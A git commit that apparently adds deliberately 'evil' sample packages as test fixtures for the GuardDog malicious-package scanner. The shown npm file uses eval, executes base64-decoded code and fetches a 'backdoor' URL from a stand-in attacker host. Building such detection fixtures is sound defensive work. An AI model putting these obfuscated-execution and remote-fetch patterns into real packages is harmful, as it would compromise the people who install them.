feat: примеры вредоносных пакетов + E2E-тест + документация

- examples/evil-pypi/: exec-base64, shady-links, code-execution, dll-hijacking - examples/evil-npm/: eval, Buffer(base64), shady-links - examples/evil-go/: exec+base64, shady-links - examples/trigger-scans.sh: сборка архивов + Docker cp + вебхуки + проверка - README.md + README.en.md: секция E2E-тестирования с curl-примерами - E2E пройден: pypi(2 findings), npm(1), go(1) — все flagged
2026-05-10 13:13:36 +03:00
parent c1258dde99
commit 11ce9802e9
8 changed files with 209 additions and 0 deletions
--- a/examples/evil-npm/index.js
+++ b/examples/evil-npm/index.js
@@ -0,0 +1,13 @@
+// GuardDog will flag: npm-api-obfuscation, npm-exec-base64, shady-links
+
+// eval usage
+eval("console.log('executed')");
+
+// base64-encoded code execution
+const encoded = "Y29uc29sZS5sb2coJ2JhZCBjb2RlJyk=";
+eval(Buffer.from(encoded, "base64").toString());
+
+// shady-links: suspicious downloads
+const url = "http://evil.example.com/backdoor";
+const https = require("https");
+https.get(url);